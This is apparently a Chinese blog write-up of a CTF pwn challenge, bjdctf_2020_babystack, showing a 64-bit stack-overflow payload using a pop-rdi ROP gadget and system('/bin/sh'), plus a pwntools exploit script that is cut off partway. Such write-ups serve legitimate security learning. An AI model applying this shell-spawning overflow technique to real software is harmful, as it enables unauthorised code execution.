CTF buuoj pwn-----第10题: bjdctf_2020_babystack

本文档详细记录了通过利用程序中的后门函数,结合64位系统调用约定,构造payload并使用Python编写exploit来执行系统命令获取BJDCTF挑战的flag的过程。

CTF buuoj pwn-----第10题: bjdctf_2020_babystack


1 思路

  • 本题有后门函数, 最简单的是直接调用, 又快又好.
  • 这里想用一下system函数,一开始忘了本题是64位的,调用约定不同, 写了个payload_1 = b’a’*(0x10+8) + p64(system_addr)+p64(1)+p64(binsh_addr) 显然不成功
  • 后来反映过来, 写了payload_1 = b’a’*(0x10+8) + p64(pop_rdi_addr)+p64(binsh_addr)+p64(system_addr),成功获取flag

2 编写exp

from pwn import *  

context.log_level='debug'

sh = remote('node4.buuoj.cn', 26883)
elf = ELF('./bjdctf_2020_babystack')  


pop_rdi_addr = 0x400833
system_addr = elf.sym['system']
binsh_addr = 0x400858
main_addr = elf.sym['main']


sh.recvuntil
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值